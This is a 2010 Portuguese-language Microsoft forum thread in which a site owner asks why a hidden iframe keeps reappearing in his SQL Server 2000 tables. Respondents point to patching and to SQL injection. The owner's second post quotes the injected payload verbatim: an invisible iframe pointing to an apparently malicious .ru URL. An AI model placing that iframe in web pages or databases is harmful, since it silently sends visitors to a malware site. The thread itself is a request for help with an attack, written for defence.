locked
Banco com vírus, como resolver? RRS feed

  • Pergunta

  • Olá pessoal,

     

    O meu site pegou um vírus, no banco de dados SQL Server 2000, na verdade, foram dois sites distintos, mas que estão dentro do mesmo servidor de hospedagem. Um site eliminei até a conta e o banco, outro site desativei e limpei o banco onde tinha o vírus.

     

    O vírus fica no campo do SQL tipo <iframe> http://umsitela.php..</iframe> algo assim.

     

    Só que passa um tempo esse vírus aparece numa outra tabela também, automaticamente.

     

    Como resolver isso? O problema já está no servidor? Mesmo o site desativado, sem uso, com o banco limpo desse vírus, eles aparecem.

     

    Desde já, agradeço!


    Marcelo Vinicius
    • Movido Gustavo Maia Aguiar quinta-feira, 12 de agosto de 2010 18:32 (De:SQL Server - Desenvolvimento Geral)
    quinta-feira, 12 de agosto de 2010 11:57

Respostas

  • Marcelo,

    Achei um um site que pode (e deve) estar relacionado ao seu problema.

    http://isc.sans.edu/diary.html?storyid=9397

    Basicamente você deve estar tendo um problema de SQL Injection, onde a tentativa (e bem sucessedida no seu caso) é atualizar os campos do tipo varchar com um link para um iframe, este iframe não é perceptível ao usuário final, ou seja, o usuário entra, acessa normalmente a página que ele quer e de forma oculta habilita este iframe.

    A idéia que eu posso imaginar para resolver seu problema é tratar SQL Injection para que isto não ocorra.

    Espero ter ajudado,

    Ricardo Muramatsu


    http://ricardomura.spaces.live.com
    segunda-feira, 23 de agosto de 2010 19:06

Todas as Respostas

  • Bom dia,

    Seu SQL Server 2000 está com o SP4 ? Não possui nada disparando no banco que realmente faz esse tipo de atualização (alterar os dados do bd)?

    Bom, se realmente for vírus, a partir do SP3 foi capaz de resolver problema com um vírus antigo denominado "Slammer".

    Acredito que se o seu SQL 2000 não estiver atualizado possa ser isso.

    Abraços

    Miller

     

    quinta-feira, 12 de agosto de 2010 12:10
  • Segundo o rapaz do servidor, está tudo ok e ele disse que o problema é com a programação. MAS, já é o segundo programador. Primeiro o site foi criado em ASP.NET, e deu esse problema com SQL server nesse servidor, depois o site foi feito com outro programador em ASP, usando esse mesmo sql server / servidor e deu esse mesmo problema.

    Agora esse site foi desenvolvido por mim, em ASP, fiz proteção de SQL injetct, etc, e apareceu esse mesmo problema no banco (usei o mesmo banco / servidor de hospedagem dos outros)

    Será que o problema está com o servidor, que está infectado?

    encontra o virus "<iframe src="http://nemohuildiin.ru/todos/go.php?sid=1" width="0" height="0" style="display:none"></iframe>" no banco de dados na tabela

    Ele se repete nos outros campos, limpa e ele volta em campos variados e o navegador acusa vírus e google também


    Marcelo Vinicius
    quinta-feira, 12 de agosto de 2010 13:26
  • Ninguém?
    Marcelo Vinicius
    quinta-feira, 12 de agosto de 2010 22:48
  • Marcelo,

    Achei um um site que pode (e deve) estar relacionado ao seu problema.

    http://isc.sans.edu/diary.html?storyid=9397

    Basicamente você deve estar tendo um problema de SQL Injection, onde a tentativa (e bem sucessedida no seu caso) é atualizar os campos do tipo varchar com um link para um iframe, este iframe não é perceptível ao usuário final, ou seja, o usuário entra, acessa normalmente a página que ele quer e de forma oculta habilita este iframe.

    A idéia que eu posso imaginar para resolver seu problema é tratar SQL Injection para que isto não ocorra.

    Espero ter ajudado,

    Ricardo Muramatsu


    http://ricardomura.spaces.live.com
    segunda-feira, 23 de agosto de 2010 19:06